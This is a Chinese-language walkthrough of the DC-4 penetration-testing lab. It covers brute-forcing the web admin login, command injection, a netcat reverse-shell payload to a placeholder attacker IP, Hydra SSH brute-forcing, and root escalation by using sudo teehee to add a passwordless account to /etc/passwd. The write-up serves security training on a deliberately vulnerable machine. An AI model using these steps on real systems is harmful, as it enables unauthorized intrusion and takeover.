DC-4靶机渗透
直接vm打开靶机,NAT模式,nmap 扫描局域网存活的主机
发现142,直接上个全扫描发现了开放了22 和80端口,分别对应的ssh和http服务
linux操作系统
浏览器打开网站
发现admin后台登录,这里直接用admin账号,不要问我咋知道的,直觉!
bp**admin的口令拿到口令登录:
命令执行,拦截包,重放,发现没有任何过滤机制
这里只是命令中的空格被+号代替,发现除了root用户之外,还有三个用户账户
这里执行直接反弹shell
kali监听4444端口
payload:nc±c+/bin/sh+attackerip+4444
成功反弹
拿到shell,一波常规操作
发现是网站用户,没有什么权限可利用,所有还是得用其他用户权限,我直接横向到其他用户家目录里,看有什么可利用的没发现了jim用户家目录中有个backups
看看
有个备份文件,可以根据老口令,来生成一个**字典
直接九头蛇怼上去
拿到口令了,理论上来说,没有穷举攻击拿不下的系统。
ssh连接:尝试了一波sudo+git的提权,没有成功
然后看了一下mbox文件内容
这是一封邮件简介的文件,也提醒我们去查找邮件
拿到charles用户账号的口令
切换用户
看看有那些是root权限运行的二进制文件,这里可以用sudo
利用teehee创建空口令账号并加入到管理员组,这里用了一个linux系统的bug,如果账户口令为空就会以passwd这个文件为主要的依据
切换admin账号:
拿到flag!
总结:
先是admin账号**,进入后台,发现了命令执行,通过命令执行发现三个账户,直接反弹shell到本地,用网站用户找到其他用户的家目录,拿到了其中一个用户的oldpasswd备份文件,九头蛇**,成功ssh到该用户,尝试提权无果,随发现另一个账号密码的邮件,横向到另一个用户,扫描root权限执行的二进制文件,teehee创建一个空口令用户并加入到管理员组,切换用户,然后成功提权到root用户!